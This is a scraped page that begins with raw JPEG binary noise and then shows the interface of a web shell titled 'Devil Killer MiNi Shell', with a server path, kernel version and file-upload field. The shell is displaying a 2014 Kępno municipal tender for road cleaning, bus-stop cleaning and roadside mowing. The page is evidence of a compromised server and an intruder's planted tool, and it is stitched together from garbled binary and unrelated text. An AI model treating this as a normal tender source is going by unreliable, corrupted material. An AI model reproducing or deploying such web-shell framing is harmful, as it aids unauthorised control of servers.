JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141128/390804-N-2014.html

<p class="kh_header"><b>Kępno: SPRZĄTANIE WYBRANYCH DRÓG BĘDĄCYCH W ZARZĄDZIE GMINY KĘPNO W 2015 R.</b><br>
<b>Numer ogłoszenia: 390804 - 2014; data zamieszczenia: 28.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kępno , ul. Ratuszowa 1, 63-600 Kępno, woj. wielkopolskie, tel. 62 78 25 800, faks 62 78 25 801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.kepno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SPRZĄTANIE WYBRANYCH DRÓG BĘDĄCYCH W ZARZĄDZIE GMINY KĘPNO W 2015 R..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem przetargu jest: sprzątanie wybranych dróg będących w zarządzie Gminy Kępno w 2015 r.
Sposób realizacji przedmiotu zamówienia określa projekt umowy, który stanowi integralną część niniejszej specyfikacji (załącznik nr 4).
KĘPNO
Lp. Nazwa ulicy Długość ulicy (m)  Pow.parkingu (m2)  Częstotliwość sprzątania
1	Aleje Marcinkowskiego (odcinek Poniatowskiego - Rynek)	40	2 razy w tygodniu
2	Aleksandra Fredry	138	co 1 miesiąc
3	Antoniego Serbeńskiego	212	co 1 miesiąc
4	Armii Krajowej	1.067	co 2 tygodnie
5	Armii Poznań	218	co 2 tygodnie
6	Berwińskiego	97	co 2 tygodnie
7	Boczna	380	co 2 tygodnie
8	Bohaterów Września	892	co 2 tygodnie
9	Bolesława Prusa	152	co 1 miesiąc
10	Bractwa Kurkowego	372	co 1 miesiąc
11	Chopina	409	co 2 tygodnie
12	Cicha	279	co 2 tygodnie
13	Cichy Zaułek	97	co 2 tygodnie
14	Dąbrowskiego (odcinek Sikorskiego - park miejski)        	84	co 2 tygodnie
15	Długa	232	co 2 tygodnie
16	Donata Wyderkowskiego	185	co 2 tygodnie
17	Elizy Orzeszkowej	200	co 1 tydzień
18	Estkowskiego	301	co 1 tydzień
19	Graniczna	633	co 1 tydzień
20	Grobla	72	co 1 tydzień
21	Gwardii Ludowej	187	co 2 tygodnie
22	Hanki Sawickiej	214	co 1 tydzień
23	Henryka Wieniawskiego	203	co 2 tygodnie
24	Hipolita Młynarza	60	co 1 miesiąc
25	Jacka Malczewskiego	262	co 1 miesiąc
26	Janka Krasickiego	417	co 2 tygodnie
27	Jesienna	62	co 1 miesiąc
28	Józefa Chełmońskiego	625	co 1 miesiąc
29	Karłowicza	317	co 2 tygodnie
30	Karola Kurpińskiego	137	co 1 miesiąc
31	Kazimierza Wiłkomirskiego	303	co 1 miesiąc
32	Kombatantów	166	co 2 tygodnie
33	Kościelna (odcinek Szkolna - Kościuszki)	48	2 razy w tygodniu
34	Kościuszki (wjazd na Rynek)	32	 2 razy w tygodniu
35	Kraszewskiego	137	co 1 tydzień
36	Kręta	128	3 razy w tygodniu
37	Krótka	54	3 razy w tygodniu
38	Ks. Mariana Magnuszewskiego	171	co 1 tydzień
39	Ks. P. Wawrzyniaka	350	co 1 tydzień
40	Lenino	78	co 2 tygodnie
41	Letnia	205	co 1 miesiąc
42	Łazienkowa	52	co 1 tydzień
43	Łąkowa	126	co 1 tydzień
44	1 Maja	78	co 1 tydzień
45	3 Maja	77	co 1 tydzień
46	Manifestu Lipcowego	285	co 2 tygodnie
47	Mickiewicza	189	2 razy w tygodniu
48	Młyńska	1.181	co 1 tydzień
49	Moniuszki	391	co 2 tygodnie
50	Monte Cassino	110	co 2 tygodnie
51	Nowa	295	co 2 tygodnie
52	Nowowiejskiego	653	co 1 tydzień
53	Ofiar Oświęcimskich	44	co 2 tygodnie
54	Ofiar Torzeńca i Wyszanowa	58	co 2 tygodnie
55	Ogrodowa	152	co 1 tydzień
56	Paderewskiego	381	co 2 tygodnie
57	Parkowa	152	co 2 tygodnie
58	Piotra Potworowskiego	1.408	co 2 tygodnie
59	PKWN	139	co 2 tygodnie
60	Plac Księdza Nowackiego	85	co 1 tydzień
61	Polna	248	co 1 tydzień
62	Poniatowskiego (odcinek Al. Marcinkowskiego - Zamkowa)	100	co 1tydzień
63	Pogodna	216	co 2 tygodnie
64	Polna	369	co 1 tydzień
65	Powstańców Wielkopolskich	406	co 1 tydzień
66	PPR	192	co 2 tygodnie
67	PPS	266	co 2 tygodnie
68	Radosna	184	co 2 tygodnie
69	Ratuszowa	115	2 razy w tygodniu
70	Ruchu Oporu	614	co 2 tygodnie
71	Rzeźnicka (odcinek przy sklepie Sedal)	56	co 1 miesiąc
72	Sienkiewicza (odcinek Wiosny Ludów - Wojska Polskiego)	310	2 razy w tygodniu
73	Sieroca	153	co 1 tydzień
74	Skośna	237	co 1 tydzień
75	Skryta	53	co 1 tydzień
76	Słodowa	123	co 1 tydzień
77	Słoneczna	547	co 1 tydzień
78	Spokojna	131	co 1 tydzień
79	Spółdzielcza	410	co 1 tydzień
80	Stanisława Wyspiańskiego	259	co 1 miesiąc
81	Stara	186	co 1 tydzień
82	Strumykowa	462	co 1 tydzień
83	21 Stycznia	263	co 2 tygodnie
84	Szkolna	149	co 1 tydzień
85	Szpitalna	429	co 1 tydzień
86	Szymanowskiego	384	co 2 tygodnie
87	Tadeusza Sygietyńskiego	166	co 1 miesiąc
88	Targowa	190	co 2 tygodnie
89	Tęczowa	545	co 1 miesiąc
90	Towarowa	390	co 2 tygodnie
91	Tysiąclecia	197	co 1 tydzień
92	Wacława Kokocińskiego	332	co 1 miesiąc
93	Walki Młodych	2.435	co 1 tydzień
94	Wesoła	210	co 2 tygodnie
95	Wiatrakowa	378	co 1 tydzień
96	Wincentego Schmidta	64	co 1 miesiąc
97	Wiosenna	158	co 1 miesiąc
98	Witolda Lutosławskiego	766	co 1 miesiąc
99	Witolda Małcużyńskiego	420	co 1 miesiąc
100	Władysława Reymonta	153	co 1 miesiąc
101	Władysława Turowskiego	46	co 1 miesiąc
102	Wodna	279	co 1 miesiąc
103	Wojska Polskiego	634	co 2 tygodnie
104	Wolności	259	co 1 tydzień
105	Zacisze	266	co 2 tygodnie
106	Zachodnia	123	co 1 tydzień
107	Zamenhofa	250	co 2 tygodnie
108	Zamkowa	241	co 1 tydzień
109	Zielona	238	co 2 tygodnie
110	Zwycięstwa	199	co 2 tygodnie
111	Bez nazwy (tzw. aleja topolowa) przy osiedlu 700-Lecia	324	co 1 tydzień
112	Bez nazwy (boczna ul. Wrocławskiej)	200	co 1 miesiąc
113	Bez nazwy (boczna ul. Osińskiej)	148	co 1 miesiąc
114	Bez nazwy (boczna ul. Obr. Pokoju, przy drukarni)	90	co 1 miesiąc
115	Bez nazwy (boczna ul. Obr. Pokoju, przy granicy z Gminą Baranów)	300	co 1 miesiąc
116	Bez nazwy (boczna ul. Poznańskiej)	238	co 2 tygodnie
117	Bez nazwy (na Os. Mściwoja)	106	co 2 tygodnie
118	Bez nazwy (na Os. Mściwoja)	93	co 2 tygodnie
119	Bez nazwy (za sądem rejonowym)	154	co 2 tygodnie
120	Bez nazwy (boczna ul. Spółdzielczej)	194	co 2 tygodnie
121	Parking przy ul. Walki Młodych (obok kina Sokolnia) 	1.600 m2	co 1 tydzień
122	Parking przy ul. Ks. P. Wawrzyniaka (naprzeciwko restauracji Kamiński)	1.080 m2	co 1 tydzień
			
HANULIN
1	Boczna	125	co 2 tygodnie
2	Bohaterów Westerplatte	850	co 2 tygodnie
3	Janusza Kusocińskiego	825	co 2 tygodnie
4	Kwiatowa	400	co 2 tygodnie
5	Meliorantów	405	co 2 tygodnie
6	Parkowa	100	co 2 tygodnie
7	Powstańców Wielkopolskich	525	co 2 tygodnie
8	Wolności	475	co 2 tygodnie
9	Wrzosowa	225	co 2 tygodnie
Obowiązek wymieniony w niniejszym punkcie realizowany będzie poprzez:
a zamiatanie mechaniczne jezdni, a w przypadku braku takiej możliwości  poprzez zbieranie odpadów z jezdni oraz zamiatanie ręczne,
b mechaniczne lub chemiczne usuwanie chwastów z jezdni i chodników.

2. sprzątanie przystanków komunikacji publicznej na terenie gminy Kępno;
Wykaz przystanków (z podziałem na wiaty, zatoki i przystanki przy znakach drogowych) przedstawia poniższa tabela:

Lp.	Adres przystanku	Rodzaj i ilość przystanków	Częstotliwość sprzątania
1	Kępno, Aleje Marcinkowskiego	zatoka	3x/tydz.
2	Kępno, ul. Broniewskiego	wiata	5x/tydz.
3	Kępno, ul. Dworcowa 	znak drogowy	3x/tydz.
4	Kępno, ul. Kwiatowa	znak drogowy	3x/tydz.
5	Kępno, ul. Obr. Pokoju	zatoka - 2 szt.	3x/tydz.
6	Kępno, ul. Osińska	znak drogowy	2x/tydz.
7	Kępno, ul. Poznańska	wiata, zatoka, znak drogowy	3x/tydz.
8	Kępno, ul. Przemysłowa	wiata	3x/tydz.
9	Kępno, ul. Solidarności	wiata, zatoka	3x/tydz.
10	Kępno, ul. Wieluńska	zatoka - 2 szt.	3x/tydz.
11	Kępno, ul. Wrocławska	znak drogowy	2x/tydz.
12	Borek Mielęcki	wiata	1x/tydz.
13	Domanin	wiata - 2 szt.	1x/tydz.
14	Hanulin	wiata - 3 szt.	2x/tydz.
15	Kierzenko	wiata - 2 szt.; znak drogowy	1x/tydz.
16	Kierzno	wiata	1x/tydz.
17	Kliny 	wiata - 2 szt.; zatoka	2x/tydz.
18	Krążkowy	wiata; znak drogowy	2x/tydz.
19	Mechnice	wiata - 2 szt.	2x/tydz.
20	Mianowice	wiata, zatoka	2x/tydz.
21	Mikorzyn	wiata - 3 szt.; znak drogowy	2x/tydz.
22	Myjomice	wiata - 4 szt.	2x/tydz.
23	Olszowa	wiata - 2 szt.; znak drogowy - 2 szt.	2x/tydz.
24	Osiny	wiata - 2 szt.	2x/tydz.
25	Ostrówiec	wiata	2x/tydz.
26	Przybyszów 	wiata	1x/tydz.
27	Pustkowie Kierzeńskie 	wiata	1x/tydz.
28	Rudniczysko - granica gminy	wiata	1x/2tyg.
29	Rzetnia Motel Pod Borem	wiata - 2 szt.	2x/tydz.
30	Rzetnia wieś	wiata	2x/tydz.
31	Szklarka Mielęcka 	wiata - 2 szt.	2x/tydz.
32	Świba	wiata - 4 szt.; znak drogowy	2x/tydz.
			
Ogółem: 43 wiaty, 9 zatok, 11 znaków drogowych.
Obowiązek, o którym mowa w niniejszym punkcie będzie spełniany poprzez uprzątanie i pozbycie się błota, śniegu, lodu i innych zanieczyszczeń z przystanków komunikacyjnych z częstotliwością podaną w tabeli.

3. sprzątanie i odśnieżanie chodnika przyległego do terenu byłego placu zabaw przy ulicy Ks. P. Wawrzyniaka oraz wzdłuż Przedszkola Samorządowego nr 5 z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości odpadów lub śniegu - nie rzadziej niż raz w tygodniu;

4. sprzątanie i odśnieżanie chodnika u zbiegu ulic Spółdzielczej i Wiosny Ludów na odcinkach przyległych do nieruchomości oznaczonej numerem geodezyjnym 1867 (teren zielony) z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości zalegających odpadów lub śniegu - nie rzadziej niż raz w tygodniu,

5. sprzątanie i odśnieżanie chodnika u zbiegu ulic Aleje Marcinkowskiego, Walki Młodych i Tysiąclecia na odcinkach przyległych do nieruchomości oznaczonej numerem geodezyjnym 912 przez 1 (teren zielony wraz z placem zabaw) z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości zalegających odpadów lub śniegu - nie rzadziej niż raz w tygodniu,

6. sprzątanie i odśnieżanie chodnika wokół parkingu przy kinie Sokolnia (przy ulicy Walki Młodych) z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości zalegających odpadów lub śniegu - nie rzadziej niż raz w tygodniu,

7. sprzątanie i odśnieżanie chodnika przy ulicy Walki Młodych wzdłuż terenu Kępińskiego Ośrodka Sportu i Rekreacji z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości zalegających odpadów lub śniegu - nie rzadziej niż dwa razy w miesiącu,

8. sprzątanie i odśnieżanie nieruchomości przy ulicy Kościuszki oznaczonej numerem geodezyjnym 1955 (przy budynku Kościuszki 7) oraz chodnika przy ulicy Kościuszki przyległego do wymienionej nieruchomości z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości zalegających odpadów lub śniegu - nie rzadziej niż dwa razy w tygodniu.

9. sprzątanie i odśnieżanie kładki nad wiaduktem kolejowym u zbiegu ulic Ks. P. Wawrzyniaka i Powstańców Wlkp. z częstotliwością dostosowaną do stopnia zanieczyszczenia chodnika, ilości zalegających odpadów lub śniegu - nie rzadziej niż dwa razy w tygodniu.

10. koszenie poboczy dróg gminnych na terenie Gminy Kępno; zakres zadania obejmuje koszenie poboczy niżej wymienionych dróg gminnych o nawierzchni bitumicznej i tłuczniowej:
a droga G859528 (Osiny - Hanulin - Zosin),
b drogi G859632 i G859633 (Myjomice) i G859626 (Myjomice cmentarz),
c droga G859526 (Krążkowy - Kliny) i G859527 (Krążkowy - Szkoła Podstawowa),
d droga G859533 (Kierzno - Domanin - Mikorzyn),
e droga G859530 (Domanin wieś),
f drogi G859534 (Świba - Wierzbięcin) i G859535 (Świba - Nawrotów),
g drogi w Borku Mielęckim: G859684, G859683, G859682,
h drogi w Kierznie: G859553, G859532,
i droga w Krążkowych: G859643 (tzw. unijna),
j drogi w Mikorzynie: G859531, G859580,
k drogi w Olszowie: G859536, G859738, G859740,
l drogi w Osinach: G859670, G859668, G859666,
m drogi w Przybyszowie: G859674, G859694,
n drogi w Rzetni: G859637, G859699,
o ulice na terenie Kępna: Walki Młodych (odcinek od ul. Wrocławskiej do skrzyżowania z torami kolejowymi; ul. Lutosławskiego; ul. Słoneczna; ul. Ruchu Oporu).
Zakres zadania, o którym mowa w niniejszym punkcie obejmuje:
- trzykrotne obustronne koszenie poboczy dróg gminnych znajdujących się na terenie Gminy Kępno; średnia szerokość koszenia wynosi 1,5 m, wysokość 5 cm; koszenie musi zostać wykonane mechanicznie;
- dokaszanie ręczne przy znakach, słupkach i barierkach drogowych, słupach telekomunikacyjnych, energetycznych, drzewach, krzewach, ogrodzeniach, koszenie poboczy wokół przystanków autobusowych znajdujących się na trasie dróg zleconych do koszenia itp.,
 zbieranie i usunięcie odpadów ze skoszonych terenów,
 zabezpieczenie i oznakowanie terenu prowadzonych robót przed dostępem osób niepowołanych, zgodnie z obowiązującymi przepisami.
Ustala się następujące terminy wykonania usług: 
 pierwsze koszenie - w okresie 15 maja - 31 maja 2015 r., 
 drugie koszenie - w okresie 15 lipca - 31 lipca 2015 r.,
 trzecie koszenie - w okresie 15 września - 30 września 2015 r. 

11. trzykrotne, obustronne koszenie poboczy i rowów byłej drogi krajowej nr 8  znajdującej się na terenie Gminy Kępno (od km 194+401 do km 205+405 byłej ósemki, wraz z drogami serwisowymi w Mianowicach i Olszowie):
a dokaszanie ręczne przy znakach, słupkach i barierkach drogowych, słupach telekomunikacyjnych, energetycznych, drzewach, krzewach, ogrodzeniach, koszenie pobocza wokół przystanków autobusowych znajdujących się na trasie dróg zleconych do koszenia itp.,
b zebranie i usunięcie traw i odpadów ze skoszonych terenów,
c zabezpieczenie i oznakowanie terenu prowadzonych robót przed dostępem osób niepowołanych, zgodnie z obowiązującymi przepisami.
d średnia szerokość koszenia poboczy na odcinkach pozbawionych rowów wynosi 1,5 m; wysokość trawy - 5 cm,
e na odcinkach, gdzie występują rowy przydrożne, koszenie powinno objąć pobocze oraz rów(do 30 cm za przeciwskarpą rowu),
f ustala się następujące terminy wykonania usług: 
 pierwsze koszenie - w okresie 15 maja - 31 maja 2015 r., 
 drugie koszenie - w okresie 15 lipca - 31 lipca 2015 r.,
 trzecie koszenie - w okresie 15 września - 30 września 2015 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.000,00 zł (osiem tysięcy złotych 00/100)
1. Zamawiający żąda od Wykonawców wniesienia wadium przed upływem terminu składania ofert w wysokości 8.000,00 zł (słownie: osiem tysięcy złotych 00/100).
2. Wadium wnosi się w nieprzekraczalnym terminie do dnia 8 grudnia 2014 r. do godz. 9.00.
3. Wadium może być wniesione w następujących formach:
1/ pieniądzu, 
2/ poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3/ gwarancjach bankowych,
4/ gwarancjach ubezpieczeniowych,
5/ poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy  z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.).
4. Wadium w pieniądzu powinno być wpłacone przelewem na konto Zamawiającego w Banku Zachodnim WBK S.A. Oddział w Kępnie nr rachunku 65 1090 1144 0000 0000 1400 3711 z dopiskiem SPRZĄTANIE DRÓG GMINY KĘPNO 2015.
5. Za termin wniesienia wadium w formie pisemnej przyjmuje się termin uznania na rachunku bankowego Zamawiającego. Zamawiający stwierdzi wniesienie wadium na podstawie informacji banku prowadzącego w/w rachunek.
6. Wadium w innej formie niż w pieniądzu należy złożyć w kasie Urzędu Miasta i Gminy w Kępnie ul. Ratuszowa 1, 63-600 Kępno, dołączając do oferty potwierdzenie złożenia wadium.
7. Z treści poręczenia lub gwarancji stanowiących formę wadium winno wynikać bezwarunkowe zobowiązanie poręczyciela  gwaranta do wypłaty pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 PZP na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą.
8. W zakresie wadium obowiązują uregulowania zawarte w art. 45 i 46 ustawy PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawcą może być osoba fizyczna, osoba prawna lub jednostka organizacyjna nie posiadająca osobowości prawnej oraz podmioty występujące wspólnie, o ile spełniają warunki określone w PZP oraz niniejszej SIWZ. Wykonawcy występujący wspólnie (spółki cywilne, konsorcja) ponoszą solidarną odpowiedzialność za wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres działalności jest krótszy - w tym okresie) co najmniej przez 3 miesiące świadczył usługi polegające na sprzątaniu dróg o łącznej wartości co najmniej 100.000 zł z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1/ w zakresie potencjału technicznego Zamawiający uzna, że warunek ten został spełniony, jeżeli Wykonawca wykaże posiadanie co najmniej następujących pojazdów i urządzeń:
a/ zamiatarka samochodowa - 2 szt.,
b/ ciągnik z przyczepą - 1 szt.,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie potencjału kadrowego Zamawiający uzna, że warunek ten został spełniony, jeżeli Wykonawca wykaże dysponowanie odpowiednią liczbą osób przewidzianych do realizacji przedmiotu zamówienia, tj. co najmniej 2 osobami z co najmniej 2-letnim doświadczeniem w kierowaniu pojazdami, na każdy z wykazanych w ofercie pojazdów, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

